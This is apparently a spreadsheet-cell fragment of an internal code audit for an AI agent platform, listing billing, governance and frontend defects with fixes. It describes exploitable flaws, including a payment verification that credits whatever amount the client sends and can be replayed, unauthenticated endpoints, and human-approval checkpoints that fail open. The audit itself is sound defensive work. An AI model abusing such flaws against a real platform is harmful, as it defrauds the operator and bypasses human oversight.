txn.credits_awarded = payload.amount
...
wallet = await credit_svc.add_wallet_credits(
    company_id=current_user.company_id,
    amount=payload.amount,          # ← straight from the request body
)
```
Three problems in six lines:
1. **The amount comes from the request body.** The stored `PaymentTransaction.amount` is
   never read, and Razorpay is never asked. A client can pay $1 and verify with
   `amount: 1000`.</t>
  </si>
  <si>
    <t>2. **No idempotency.** `txn.status` is not checked. The same valid
   `(order_id, payment_id, signature)` triple credits the wallet again on **every** replay.
3. **No unique constraint** on `razorpay_order_id` — it is indexed, not unique.
There is also no server-to-server webhook. Verification is a browser-initiated callback,
so the client is the only participant in the trust chain.
- [`billing/credits_router.py:146`](../../../backend/src/billing/credits_router.py:146) — `verify_topup`
- Also recorded as **D-01** in the platform register
**Fix:** credit `txn.amount`, reject when `txn.status == "success"`, and add a unique
constraint on `razorpay_order_id`. Then add the server-side webhook.
---</t>
  </si>
  <si>
    <t>14-BILLING-AND-CREDITS-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Money moves incorrectly</t>
  </si>
  <si>
    <t>BC-02</t>
  </si>
  <si>
    <t>Switching to a subscription makes the existing balance unspendable</t>
  </si>
  <si>
    <t>### BC-02 — Switching to a subscription makes the existing balance unspendable
**✅ Verified · Critical**
The deduction path is an `if` / `elif` on `account_model`:
```python</t>
  </si>
  <si>
    <t>BC-03</t>
  </si>
  <si>
    <t>Subscribing strands the wallet and grants nothing</t>
  </si>
  <si>
    <t>### BC-03 — Subscribing strands the wallet and grants nothing
**✅ Verified · Critical**
Three confirmed facts compound into a complete pay-and-get-nothing path:
1. `verify_subscription` sets `sub.status = "active"` and
   `wallet.account_model = "subscription"` and **never calls
   `inject_subscription_credits`**.
2. The `if`/`elif` above then makes the existing balance unspendable
   ([BC-02](#bc-02--switching-to-a-subscription-makes-the-existing-balance-unspendable)).
3. The only caller of `inject_subscription_credits` is the monthly cron, which
   **nothing schedules** ([BC-04](#bc-04--the-billing-crons-are-never-scheduled)).
Net effect: a subscriber pays, loses access to their existing balance, and receives no
credits until a human manually POSTs a cron endpoint.
- [`billing/credits_router.py:416`](../../../backend/src/billing/credits_router.py:416) — `verify_subscription`
- [`billing/credit_service.py:204`](../../../backend/src/billing/credit_service.py:204) — `inject_subscription_credits`
- Also recorded as **D-02** in the platform register</t>
  </si>
  <si>
    <t>BC-04</t>
  </si>
  <si>
    <t>The billing crons are never scheduled</t>
  </si>
  <si>
    <t>### BC-04 — The billing crons are never scheduled
**✅ Verified · Critical**
`WorkerSettings.cron_jobs` registers seven jobs: CORTEX resumption, dreaming, critic
calibration, skill promotion, prompt evolution, KPI rollup and cost-estimator refresh.
It registers **no daily-credit job and no monthly-billing job**. Both exist only as HTTP
endpoints under `/api/v1/cron` that an `app_admin` has to click.
There is no APScheduler, no systemd timer and no crontab anywhere in the repository.
Daily credits work only through a lazy self-heal in `get_balance`; monthly subscription
credits are never injected at all.
Two further problems in the same jobs:
- Re-running the daily job **resets** rather than tops up:
  `wallet.daily_credits = daily_amount` is an assignment.
- The monthly job does not charge anyone. Its Razorpay branch is
  `if razorpay_client and sub.razorpay_subscription_id:` — and
  `razorpay_subscription_id` is **never populated anywhere in the codebase**, so the branch
  is always skipped. Inside it, the `try` block contains only a log line, so the `except`</t>
  </si>
  <si>
    <t>that would set `past_due` is unreachable. The job records a `success` transaction and
  grants credits **regardless of whether money moved**.
- [`ai/worker.py`](../../../backend/src/ai/worker.py) — the `cron_jobs` list
- [`billing/cron_service.py:87`](../../../backend/src/billing/cron_service.py:87) — the unreachable branch
- Also recorded as **D-03** in the platform register
---</t>
  </si>
  <si>
    <t>BC-05</t>
  </si>
  <si>
    <t>Three of the four credit gates have no callers</t>
  </si>
  <si>
    <t>### BC-05 — Three of the four credit gates have no callers
**✅ Verified · Critical**
`14-billing-and-credits.md` and `01-product-overview.md` both describe credit enforcement
at four points in a run. Grepping for call sites:
| Gate | Purpose | Callers in `backend/src` |
|---|---|---|
| `check_credit_gate` | refuse to start on an empty wallet | **none** |
| `consume_step_cost` | incremental deduction after each step | **none** |
| `check_credit_circuit_breaker` | stop a run mid-flight | **none** |
| `CreditService.require_credits` | assert before spending | **none** |
| `check_child_credit_gate` | before spawning a child | [`step_executor.py:236`](../../../backend/src/ai/step_executor.py:236) ✅ |
| `settle_billing` | final settlement | [`agent_loop.py:1134`](../../../backend/src/ai/core/agent_loop.py:1134) ✅ |
So a normal agent run has **no pre-execution credit gate and no in-run circuit breaker**.
The whole cost of a run accrues and is only debited at the end, and a run started with a
zero wallet runs to completion.</t>
  </si>
  <si>
    <t>The user-facing message *"Partial results saved. Please top up credits and retry."* comes
from a code path that never executes.
All four unused methods are defined and unit-tested, which is why this survived.
**Fix:** call `check_credit_gate` at run start and `check_credit_circuit_breaker` after each
step, from `AgentLoop`. Both already exist and both are tested.
---</t>
  </si>
  <si>
    <t>BC-06</t>
  </si>
  <si>
    <t>There are no holds, so one run can overdraw</t>
  </si>
  <si>
    <t>### BC-06 — There are no holds, so one run can overdraw
**📄 Doc-reported · High**
Cost accrues on the run and the wallet is debited only at settlement. With no reservation
and — per [BC-05](#bc-05--three-of-the-four-credit-gates-have-no-callers) — no in-run
breaker either, a single expensive run can spend far beyond the available balance and the
platform discovers it at the end.
`Budget.usd_max` defaults to **$100**, two orders of magnitude above the $0.50 `PROCESS`
credit floor. So the in-loop budget will not stop it either.
- Also recorded as **D-37** in the platform register
---</t>
  </si>
  <si>
    <t>BC-07</t>
  </si>
  <si>
    <t>Fixed-cost tool charges write no usage_logs row</t>
  </si>
  <si>
    <t>### BC-07 — Fixed-cost tool charges write no `usage_logs` row
**📄 Doc-reported · High**
`image_generation` ($0.04) and `video_generate` ($0.05) bump `run.total_cost_usd` directly
but write **no** `usage_logs` row, because `sku_id` is `NOT NULL` and there is no SKU.
So the attribution dashboard and the usage-breakdown report under-report against the
wallet. The money is charged and the line item does not exist, which makes
"why was I charged $X?" unanswerable for exactly those tools.
---</t>
  </si>
  <si>
    <t>3. T1 — Metering that under- or double-counts</t>
  </si>
  <si>
    <t>BC-08</t>
  </si>
  <si>
    <t>Image generation is charged twice</t>
  </si>
  <si>
    <t>### BC-08 — Image generation is charged twice
**📄 Doc-reported · High**
`image_generation` self-bills $0.04 inside the tool via `BillingService`, **and** is
charged again by the executor's fixed-cost branch at TB.
A guaranteed double charge on that branch. Recorded in the tool layer as part of
[TL-19](TOOL-LAYER-DEFECTS.md#tl-19--four-price-tables-one-of-which-is-the-unused-source-of-truth).
---</t>
  </si>
  <si>
    <t>BC-09</t>
  </si>
  <si>
    <t>attribution="actor_step" is never written</t>
  </si>
  <si>
    <t>### BC-09 — `attribution="actor_step"` is never written
**📄 Doc-reported · High**
Step LLM spend — usually the majority of a run's cost — lands under `tool` instead of
`actor_step`.
The Cost Attribution dashboard's entire purpose is to show where money goes. Its largest
bucket is mislabelled, which means every conclusion drawn from it about planner-vs-critic-
vs-tool cost is wrong.
---</t>
  </si>
  <si>
    <t>BC-10</t>
  </si>
  <si>
    <t>The tool cost path ignores cost_unit and has no APP fallback</t>
  </si>
  <si>
    <t>### BC-10 — The tool cost path ignores `cost_unit` and has no APP fallback
**📄 Doc-reported · High**
Two separate gaps in one path:
1. `cost_unit` is ignored, so a per-1M-token SKU is billed as if it were per-unit.
2. There is no fallback to the APP company's SKU, unlike the LLM path.
Net effect: **an unseeded tenant's tools are free.** Nothing warns; the rows simply are not
written.
---</t>
  </si>
  <si>
    <t>BC-11</t>
  </si>
  <si>
    <t>Four price tables, and the intended source of truth is unused</t>
  </si>
  <si>
    <t>### BC-11 — Four price tables, and the intended source of truth is unused
**✅ Verified · High**
`ToolCostResolver` was built as the single cached source of truth. It has **zero production
callers**. The live logic is two hand-copied blocks of `_TOOL_SKU_MAP` / `_TOOL_FIXED_COST`
literals in `step_executor.py`, plus a fourth table in `planning/cost_estimator.py`.
The flag intended to switch it on, `tools.cost_resolver_v2_enabled`, defaults to `True` and
**is never read**.
Adding one priced tool means editing four files, and forgetting one produces a silent
mis-charge.
- [`ai/governance/tool_cost_resolver.py`](../../../backend/src/ai/governance/tool_cost_resolver.py) — unused
- [`ai/step_executor.py:452`](../../../backend/src/ai/step_executor.py:452) and [`:923`](../../../backend/src/ai/step_executor.py:923) — the two inline copies
- [`ai/planning/cost_estimator.py`](../../../backend/src/ai/planning/cost_estimator.py) — the fourth table
---</t>
  </si>
  <si>
    <t>BC-12</t>
  </si>
  <si>
    <t>Telephony minutes are rounded two different ways</t>
  </si>
  <si>
    <t>### BC-12 — Telephony minutes are rounded two different ways
**📄 Doc-reported · Medium**
The **usage log** ceiling-rounds to whole minutes. The **billing event** records a
fractional minute count. The two never agree, so telephony reconciliation between the
ledger and the monthly aggregate always shows a discrepancy.
---</t>
  </si>
  <si>
    <t>BC-13</t>
  </si>
  <si>
    <t>base_cost_llm is read and then ignored; base_cost_telephony overwrites</t>
  </si>
  <si>
    <t>### BC-13 — `base_cost_llm` is read and then ignored; `base_cost_telephony` overwrites
**📄 Doc-reported · High**
In `record_billing_event`:
- `base_cost_llm` is read and its branch body is `pass`, with the comment *"Assuming base
  cost provided is directly overridden"*. The Billing Settings UI still exposes the field.
- `base_cost_telephony` **replaces** the entire `base_cost`, discarding the voice LLM audio
  cost that was passed in.
So one pricing override does nothing, and the other silently deletes a real cost component.
- [`billing/billing_service.py:126`](../../../backend/src/billing/billing_service.py:126)
---</t>
  </si>
  <si>
    <t>BC-14</t>
  </si>
  <si>
    <t>check_credit_gate, consume_step_cost, check_credit_circuit_breaker, require_credits</t>
  </si>
  <si>
    <t>| **BC-14** | `check_credit_gate`, `consume_step_cost`, `check_credit_circuit_breaker`, `require_credits` | Defined, unit-tested, **zero callers**. See [BC-05](#bc-05--three-of-the-four-credit-gates-have-no-callers) | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Gates and jobs that never run</t>
  </si>
  <si>
    <t>BC-15</t>
  </si>
  <si>
    <t>The daily and monthly cron jobs</t>
  </si>
  <si>
    <t>| **BC-15** | The daily and monthly cron jobs | Endpoints only; nothing schedules them. See [BC-04](#bc-04--the-billing-crons-are-never-scheduled) | ✅ Verified |</t>
  </si>
  <si>
    <t>BC-16</t>
  </si>
  <si>
    <t>razorpay_subscription_id</t>
  </si>
  <si>
    <t>| **BC-16** | `razorpay_subscription_id` | Declared on the model, **never populated**, so the monthly job's charge branch is always skipped | ✅ Verified |</t>
  </si>
  <si>
    <t>BC-17</t>
  </si>
  <si>
    <t>tools.cost_resolver_v2_enabled</t>
  </si>
  <si>
    <t>| **BC-17** | `tools.cost_resolver_v2_enabled` | Declared with default `True`, **never read**. Adding a flag is not the same as wiring a control | ✅ Verified |</t>
  </si>
  <si>
    <t>BC-18</t>
  </si>
  <si>
    <t>Abandoned checkouts and orphaned subscriptions</t>
  </si>
  <si>
    <t>| **BC-18** | Abandoned checkouts and orphaned subscriptions | A `pending` `payment_transactions` row stays forever; a `pending_payment` subscription with no matching payment stays forever. Nothing reaps either, and a failed payment is never recorded | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>BC-19</t>
  </si>
  <si>
    <t>partner_admin can edit platform-wide pricing</t>
  </si>
  <si>
    <t>### BC-19 — `partner_admin` can edit platform-wide pricing
**📄 Doc-reported · Critical**
`PUT /billing/config` reportedly accepts `company_id: null` from a `partner_admin`, writing
the **global default row that every tenant inherits**.
A reseller can therefore change the platform's pricing for every other reseller's tenants.
- [`billing/billing_router.py`](../../../backend/src/billing/billing_router.py)
- Also recorded as **D-10** in the platform register
**Fix:** `app_admin` only for `company_id: null`. Verify before launch — this is the one
📄 entry in this file that most deserves a re-check.
---</t>
  </si>
  <si>
    <t>5. T3 — Schema, access and dead weight</t>
  </si>
  <si>
    <t>BC-20</t>
  </si>
  <si>
    <t>Two open endpoints on the money surface</t>
  </si>
  <si>
    <t>### BC-20 — Two open endpoints on the money surface
**✅ Verified · High**
| Endpoint | Guard |
|---|---|
| `GET /reports/costing` | `get_current_user` only — **no role check**. Any user reads their company's raw provider cost and infers the markup |
| `GET /credits/subscription-tiers` | `db: AsyncSession = Depends(get_db)` — **no auth at all** |
The sibling POST/PUT/DELETE routes on the subscription-tiers path *are* admin-gated. Only
the read is open.
- [`billing/billing_router.py:148`](../../../backend/src/billing/billing_router.py:148)
- [`billing/credits_router.py:199`](../../../backend/src/billing/credits_router.py:199)
- Also **D-08** and **D-09**; see
  [PO-04](01-PRODUCT-OVERVIEW-DEFECTS.md#po-04--any-logged-in-user-can-read-the-internal-cost-report)
---</t>
  </si>
  <si>
    <t>BC-21</t>
  </si>
  <si>
    <t>Percentages and fractions are mixed, with the wrong label</t>
  </si>
  <si>
    <t>### BC-21 — Percentages and fractions are mixed, with the wrong label
**📄 Doc-reported · High**
`pf`, `spf` and `d` are **fractions** (`0.15`). `SubscriptionTier.bonus_pct` is a
**percentage** (`30.0`). The Billing Settings UI labels the first group "%" anyway.
An admin entering `15` where `0.15` is meant configures a **1500% platform fee**. Nothing
validates the range.
**Fix:** validate `0 ≤ pf, spf, d ≤ 1` on write and fix the label. Two minutes, and it
prevents a mis-billing that would be very hard to unwind.
---</t>
  </si>
  <si>
    <t>BC-22</t>
  </si>
  <si>
    <t>The seeded default is not at cost</t>
  </si>
  <si>
    <t>### BC-22 — The seeded default is not at cost
**📄 Doc-reported · Medium · not a bug**
The global default is `mf=1.3`, `pf=0.15`, `spf=0.10` — every tenant pays **1.625× raw
cost** by default.
Recorded because any pricing analysis assuming `mf=1.0` is wrong, and because the
"identity formula" fallback (`mf=1, pf=spf=d=0`) applies only when **no** config row
exists at all.
---</t>
  </si>
  <si>
    <t>BC-23</t>
  </si>
  <si>
    <t>### BC-23 — `subscription_tiers` has no migration
**✅ Verified · High**
Referenced by the ORM, the credits router and the seed path; created by nothing in
`backend/migrations/`. A database built purely from Alembic lacks the table and every
subscription route fails.
Same as [DM-01](03-DATA-MODEL-DEFECTS.md#dm-01--subscription_tiers-has-no-migration) and
**D-06**.
---</t>
  </si>
  <si>
    <t>BC-24</t>
  </si>
  <si>
    <t>### BC-24 — `billing_events` has no unique constraint
**✅ Verified · High**
No `__table_args__`, no `UniqueConstraint` on
`(company_id, period_month, grouping_type, grouping_value)`. Concurrent settlements
duplicate rows and every report summing the table over-counts.
Same as [DM-04](03-DATA-MODEL-DEFECTS.md#dm-04--billing_events-has-no-unique-constraint) and
**D-07**.
---</t>
  </si>
  <si>
    <t>BC-25</t>
  </si>
  <si>
    <t>Stripe is a dependency with no code, and verify_topup returns a duplicate key</t>
  </si>
  <si>
    <t>### BC-25 — Stripe is a dependency with no code, and `verify_topup` returns a duplicate key
**✅ Verified · Low**
`stripe = "^7.0.0"` is declared in `pyproject.toml`. There is no `import stripe` anywhere
under `backend/src/`, and the Stripe-era tables (`invoices`, `payment_methods`,
`ledger_entries`) were dropped by migration `a804c0db1551`.
Anyone looking for an invoice table will not find one — `billing_events` is the closest
artefact and it is a monthly aggregate.
Separately, `verify_topup`'s return dict contains the key `"message"` **twice**. Harmless,
and a fair indicator of how much of that file has been reviewed.
- [`backend/pyproject.toml:32`](../../../backend/pyproject.toml:32)
- [`billing/credits_router.py`](../../../backend/src/billing/credits_router.py) — the duplicate key
---</t>
  </si>
  <si>
    <t>GH-01</t>
  </si>
  <si>
    <t>If Redis is down, every HITL checkpoint is skipped</t>
  </si>
  <si>
    <t>15. Governance, HITL &amp; Feature Flags</t>
  </si>
  <si>
    <t>### GH-01 — If Redis is down, every HITL checkpoint is skipped
**✅ Verified · Critical**
The HITL wait subscribes to `hitl:{approval_id}` and polls to a deadline. The whole block
is wrapped in:
```python
except Exception as hitl_err:
    if "Execution blocked" in str(hitl_err) or "timed out" in str(hitl_err):
        raise
    logger.warning(f"HITL pub/sub error: {hitl_err}")
    # Non-fatal: continue execution if pub/sub fails
```
Any pub/sub failure — Redis unreachable, connection dropped, subscribe error — logs a
warning and **the step proceeds unapproved**. The `human_approvals` row stays `PENDING`
forever, so the approvals page shows a checkpoint that is still waiting for a decision on
work that already happened.
This is the safety feature the product is sold on, and it is disabled by a Redis blip with
one warning line.</t>
  </si>
  <si>
    <t>- [`ai/governance/governance_service.py:392`](../../../backend/src/ai/governance/governance_service.py:392) — the swallow
**Fix:** fail closed. A checkpoint that cannot be evaluated must block the step, not skip
it. If that is too strict, at minimum mark the approval row `ERROR` so it is visible.
---</t>
  </si>
  <si>
    <t>15-GOVERNANCE-AND-HITL-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — Gates that fail open</t>
  </si>
  <si>
    <t>GH-02</t>
  </si>
  <si>
    <t>Two of the four credit gates are never called</t>
  </si>
  <si>
    <t>### GH-02 — Two of the four credit gates are never called
**✅ Verified · Critical**
Grepping `backend/src` for call sites:
| Gate | Callers |
|---|---|
| `check_credit_gate` — refuse to start on an empty wallet | **none** |
| `consume_step_cost` — incremental deduction | **none** |
| `check_credit_circuit_breaker` — stop mid-flight | **none** |
| `check_child_credit_gate` | [`step_executor.py:236`](../../../backend/src/ai/step_executor.py:236) ✅ |
| `settle_billing` | [`agent_loop.py:1134`](../../../backend/src/ai/core/agent_loop.py:1134) ✅ |
So the only two credit controls that run are the child-spawn gate and the final
settlement. A normal agent run has **no pre-execution credit gate and no in-run circuit
breaker**.
All the unused methods are implemented and unit-tested, which is exactly why nobody
noticed.
Recorded in full as</t>
  </si>
  <si>
    <t>[BC-05](14-BILLING-AND-CREDITS-DEFECTS.md#bc-05--three-of-the-four-credit-gates-have-no-callers).
---</t>
  </si>
  <si>
    <t>GH-03</t>
  </si>
  <si>
    <t>The rate limiter fails open, and has no callers anyway</t>
  </si>
  <si>
    <t>### GH-03 — The rate limiter fails open, and has no callers anyway
**📄 Doc-reported · High**
`RedisRateLimiter` is a correct sliding-window implementation. Two problems:
1. A Redis error returns `True` (allowed) rather than blocking. That is deliberate — but it
   means a Redis outage removes rate limiting entirely, at the moment load is most likely
   to be the cause.
2. It has **zero call sites**. Its own docstring gives the example key
   `"tool:search:company_123"`; nothing constructs one.
There is no per-tenant quota anywhere in the platform.
- [`ai/governance/rate_limiter.py`](../../../backend/src/ai/governance/rate_limiter.py)
- Also [TL-28](TOOL-LAYER-DEFECTS.md#4-t2--delete)
---</t>
  </si>
  <si>
    <t>GH-04</t>
  </si>
  <si>
    <t>The suspension middleware fails open and only covers one process</t>
  </si>
  <si>
    <t>### GH-04 — The suspension middleware fails open and only covers one process
**✅ Verified · High**
`CompanySuspensionMiddleware` swallows every exception and continues. A database blip
therefore silently disables suspension enforcement rather than failing closed.
It is also registered on the **backend API only**, not on the gateway — so it protects
port 8000, which nothing external reaches directly, and not the process that actually
receives external traffic.
It costs one extra database round trip on every authenticated request to do this.
- [`common/middleware.py`](../../../backend/src/common/middleware.py)
The dependency-level check in `_authenticate_user` is correct and free, and is what
actually enforces suspension. See
[AU-22](04-AUTH-RBAC-TENANCY-DEFECTS.md#au-22--suspension-is-checked-twice-in-two-different-ways).
---</t>
  </si>
  <si>
    <t>GH-05</t>
  </si>
  <si>
    <t>An unmapped tool costs $0 and warns once per process</t>
  </si>
  <si>
    <t>### GH-05 — An unmapped tool costs $0 and warns once per process
**📄 Doc-reported · High**
A tool with no SKU mapping resolves to zero cost, consumes no budget, appears in no cost
report — and logs a warning **once per process**, so on a long-lived worker the second and
subsequent occurrences are silent.
So adding a tool without adding its price makes it free, permanently and quietly. This is
the failure mode that makes
[BC-11](14-BILLING-AND-CREDITS-DEFECTS.md#bc-11--four-price-tables-and-the-intended-source-of-truth-is-unused)
expensive: four price tables, and forgetting one produces no error.
---</t>
  </si>
  <si>
    <t>GH-06</t>
  </si>
  <si>
    <t>Reject and timeout are detected by matching exception text</t>
  </si>
  <si>
    <t>### GH-06 — Reject and timeout are detected by matching exception text
**✅ Verified · High**
```python
if "Execution blocked" in str(hitl_err) or "timed out" in str(hitl_err):
    raise
```
Whether a rejected approval actually blocks the run depends on a **substring of an error
message**. Reword either message — a translation, a clarification, a refactor — and the
gate silently stops re-raising, and rejections become approvals.
- [`ai/governance/governance_service.py:392`](../../../backend/src/ai/governance/governance_service.py:392)
**Fix:** typed exceptions. `HITLRejected` and `HITLTimeout` cannot be broken by an edit to
a message.
---</t>
  </si>
  <si>
    <t>3. T1 — HITL correctness</t>
  </si>
  <si>
    <t>GH-07</t>
  </si>
  <si>
    <t>A HITL wait blocks a worker slot</t>
  </si>
  <si>
    <t>### GH-07 — A HITL wait blocks a worker slot
**✅ Verified · High**
The service subscribes and then polls in a loop until `timeout_ms`. Default 5 minutes, and
the field is free — a tenant can set an hour.
That worker slot is unavailable for the whole wait. With a small pool, a handful of pending
approvals starves every other run in the company.
- [`ai/governance/governance_service.py:345`](../../../backend/src/ai/governance/governance_service.py:345)
**Fix:** park the run in `PAUSED`, release the worker, re-enqueue on approval. Also
[PO-20](01-PRODUCT-OVERVIEW-DEFECTS.md#po-20--a-long-hitl-timeout-ties-up-a-worker).
---</t>
  </si>
  <si>
    <t>GH-08</t>
  </si>
  <si>
    <t>COST_THRESHOLD fires before the next step, not when the threshold is crossed</t>
  </si>
  <si>
    <t>### GH-08 — `COST_THRESHOLD` fires before the *next* step, not when the threshold is crossed
**📄 Doc-reported · Medium**
Only `AFTER_STEP` fires in the `AFTER` phase. `COST_THRESHOLD` is `BEFORE`-only.
So a step that blows through the threshold completes in full, and the checkpoint fires
before whatever runs next. The money is already spent by the time a human is asked.
For a threshold whose purpose is "stop before this gets expensive", firing after the
expensive thing is the wrong half of the step boundary.
---</t>
  </si>
  <si>
    <t>GH-09</t>
  </si>
  <si>
    <t>Malformed HITL checkpoints are skipped silently</t>
  </si>
  <si>
    <t>### GH-09 — Malformed HITL checkpoints are skipped silently
**📄 Doc-reported · Medium**
A checkpoint that does not parse is skipped with a bare `continue` — no log line, no event,
nothing on the run trace.
A typo in the Safeguards tab therefore removes a safety gate with no feedback anywhere. The
user sees a configured checkpoint that never fires.
---</t>
  </si>
  <si>
    <t>GH-10</t>
  </si>
  <si>
    <t>CUSTOM expressions support two variables and two operators</t>
  </si>
  <si>
    <t>### GH-10 — `CUSTOM` expressions support two variables and two operators
**📄 Doc-reported · Medium**
The docstring says "Python-like boolean expression". The evaluator supports only
`step_count` and `current_cost`, with `&gt;` and `&gt;=`.
Anything else — `and`, `&lt;`, a tool name, a step name — evaluates to false and the
checkpoint never fires. Silently, per
[GH-09](#gh-09--malformed-hitl-checkpoints-are-skipped-silently).
**Fix:** document the two variables and two operators in the builder's help text, and
reject anything else at save time.
---</t>
  </si>
  <si>
    <t>GH-11</t>
  </si>
  <si>
    <t>The approvals page does not show what is being approved</t>
  </si>
  <si>
    <t>### GH-11 — The approvals page does not show what is being approved
**✅ Verified · High**
`context_snapshot` is stored on every approval row and rendered nowhere.
Recorded in full as
[PO-05](01-PRODUCT-OVERVIEW-DEFECTS.md#po-05--a-reviewer-approves-without-seeing-what-they-are-approving).
Listed here because it is the governance half: a checkpoint that shows the reviewer nothing
is a delay, not a control.
---</t>
  </si>
  <si>
    <t>GH-12</t>
  </si>
  <si>
    <t>meta_agent.board_routing is declared twice</t>
  </si>
  <si>
    <t>| **GH-12** | `meta_agent.board_routing` is declared twice | Both `True`, at [`feature_flags.py:53`](../../../backend/src/ai/core/feature_flags.py:53) and [`:71`](../../../backend/src/ai/core/feature_flags.py:71). Harmless — the second wins — and it makes the file look unreviewed. Also **D-29** | ✅ Verified |</t>
  </si>
  <si>
    <t>4. T2 — Feature flags that are not controls</t>
  </si>
  <si>
    <t>GH-13</t>
  </si>
  <si>
    <t>get_float has no env-var tier</t>
  </si>
  <si>
    <t>| **GH-13** | `get_float` has no env-var tier | Boolean flags resolve entity → company → global → `AI_FLAG_*` → default. Numeric flags skip the env tier entirely, so a numeric knob **cannot** be set without a database row. The documented five-tier resolution is only four tiers for half the flags | ✅ Verified |</t>
  </si>
  <si>
    <t>GH-14</t>
  </si>
  <si>
    <t>Direct SQL flag writes do not invalidate the cache</t>
  </si>
  <si>
    <t>| **GH-14** | Direct SQL flag writes do not invalidate the cache | Up to 60 seconds of staleness **per worker**, and the invalidation is process-local. The runbook says to use `FeatureFlags.set()`; the admin UI and any manual SQL do not | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>GH-15</t>
  </si>
  <si>
    <t>Legacy alias flags that control nothing</t>
  </si>
  <si>
    <t>| **GH-15** | Legacy alias flags that control nothing | `critic_pipeline.enabled` and `memory_v2.canonical` are aliases that do **not** control the modern paths — those are `critic_pipeline.v2_enabled` and `memory.v2_canonical`. Toggling the alias changes nothing and reads as though it should | 📄 Doc-reported |</t>
  </si>
  <si>
    <t>GH-16</t>
  </si>
  <si>
    <t>Flags declared and never read</t>
  </si>
  <si>
    <t>| **GH-16** | Flags declared and never read | At least eight: `agent_loop.perception_bounded_viewport`, `agent_loop.snapshot_every_iteration`, the three `agent_loop.executor_*_enabled`, `tools.cost_resolver_v2_enabled`, `sandbox.container_runtime_enabled` (never threaded into context), and `tools.experimental.*` (gates a function nothing calls). All appear on the admin Feature Flags page | ✅ Verified |</t>
  </si>
  <si>
    <t>GH-17</t>
  </si>
  <si>
    <t>ToolCostResolver is cached per process, and has no callers</t>
  </si>
  <si>
    <t>### GH-17 — `ToolCostResolver` is cached per process, and has no callers
**✅ Verified · High**
Two facts that compound:
1. It has **zero production call sites** — only its own unit test imports it. The live
   logic is two hand-copied literal blocks in `step_executor.py` plus a fourth table in
   `planning/cost_estimator.py`.
2. Its cache is per process, so even once wired, a rate change requires a restart of every
   worker.
The flag intended to switch it on, `tools.cost_resolver_v2_enabled`, defaults to `True` and
is never read.
- [`ai/governance/tool_cost_resolver.py`](../../../backend/src/ai/governance/tool_cost_resolver.py)
- Also [TL-19](TOOL-LAYER-DEFECTS.md#tl-19--four-price-tables-one-of-which-is-the-unused-source-of-truth)
  and [BC-11](14-BILLING-AND-CREDITS-DEFECTS.md#bc-11--four-price-tables-and-the-intended-source-of-truth-is-unused)
---</t>
  </si>
  <si>
    <t>5. T3 — Cost resolution and operability</t>
  </si>
  <si>
    <t>GH-18</t>
  </si>
  <si>
    <t>Budget lives on the entity, not the company</t>
  </si>
  <si>
    <t>### GH-18 — Budget lives on the entity, not the company
**📄 Doc-reported · Medium**
"Raise a tenant's budget" means editing the `governance` block of **every** entity that
tenant owns. There is no company-level cost cap anywhere.
For an operator responding to a runaway spend, there is no single lever to pull. For a
tenant with 40 entities, a budget change is 40 edits.
---</t>
  </si>
  <si>
    <t>GH-19</t>
  </si>
  <si>
    <t>The tool-call counting is off by design</t>
  </si>
  <si>
    <t>### GH-19 — The tool-call counting is off by design
**📄 Doc-reported · Low**
`max_tool_calls` renders "Tool calls remaining: N of M" into the prompt, and the counter is
reset at the start of every **step** rather than per run. So the number shown to the model
restarts repeatedly within one run, and can go negative.
It is a prompt hint, not a limit — see
[TL-21](TOOL-LAYER-DEFECTS.md#tl-21--max_tool_calls-is-a-prompt-string-not-a-limit). Listed
here because the arithmetic is visibly wrong in the prompt an operator may be reading while
debugging.
---</t>
  </si>
  <si>
    <t>GH-20</t>
  </si>
  <si>
    <t>There is no way to see why a flag has its value</t>
  </si>
  <si>
    <t>### GH-20 — There is no way to see why a flag has its value
**📄 Doc-reported · Medium**
Resolution is entity → company → global → env → default. The admin page shows the
**effective** value. It does not show which tier produced it.
So "why is this off for this tenant?" requires querying the table by hand across three
scopes and then checking the process environment. The runbook has a section for exactly
this, which is the tell.
**Fix:** return the winning tier alongside the value. It is already known at the moment of
resolution.
---</t>
  </si>
  <si>
    <t>GH-21</t>
  </si>
  <si>
    <t>Almost every gate in the platform fails open</t>
  </si>
  <si>
    <t>### GH-21 — Almost every gate in the platform fails open
**✅ Verified · High · the pattern**
Collected in one place, because individually each looks defensible:
| Gate | Failure behaviour |
|---|---|
| HITL pub/sub | continues unapproved |
| `RedisRateLimiter` | returns allowed |
| Gateway slowapi limit | not attached to most routes at all |
| `CompanySuspensionMiddleware` | continues |
| `check_semantic_duplicate` | returns "not a duplicate" |
| Webhook signature validation | logs and processes |
| Anti-sprawl in the Curator | `except Exception: pass` |
Every one of these was written so a broken control could not break a run. Together they
mean the platform has **no way to know whether its controls are working**, because a
failing gate and a passing gate produce identical observable behaviour.
---</t>
  </si>
  <si>
    <t>FE-01</t>
  </si>
  <si>
    <t>There is no error boundary</t>
  </si>
  <si>
    <t>16. Frontend Architecture</t>
  </si>
  <si>
    <t>### FE-01 — There is no error boundary
**✅ Verified · High**
Grepping the whole `frontend/src` tree for `ErrorBoundary` or `componentDidCatch` returns
nothing.
In React 18, an uncaught render error unmounts the entire tree. So a single bad field in a
single API response — a null where an object was expected — blanks the **whole
application**, with a white page and no message. The user's only recourse is a refresh,
which reproduces it.
There is also no `&lt;Suspense&gt;` boundary below the router, so a slow lazy chunk blanks the
shell in the same way.
- app-wide
- [`frontend/src/router/index.tsx:116`](../../../frontend/src/router/index.tsx:116) — no Suspense below here
- Also recorded as **D-38** in the platform register
**Fix:** one `ErrorBoundary` around `MainLayout`'s children, and a second around the
router. Perhaps forty lines, and it converts every future render bug from "the app is</t>
  </si>
  <si>
    <t>broken" into "this page is broken".
---</t>
  </si>
  <si>
    <t>16-FRONTEND-DEFECTS.md</t>
  </si>
  <si>
    <t>2. T0 — The app can blank out and nobody would know</t>
  </si>
  <si>
    <t>FE-02</t>
  </si>
  <si>
    <t>npm run lint cannot run</t>
  </si>
  <si>
    <t>### FE-02 — `npm run lint` cannot run
**✅ Verified · High**
`package.json` declares:
```json
"lint": "eslint . --ext ts,tsx --report-unused-disable-directives --max-warnings 0"
```
and `eslint`, `@typescript-eslint/*`, `eslint-plugin-react-hooks` and
`eslint-plugin-react-refresh` are all installed. There is **no ESLint config file
anywhere** in the repository.
So the command fails immediately, and there is no lint gate at all.
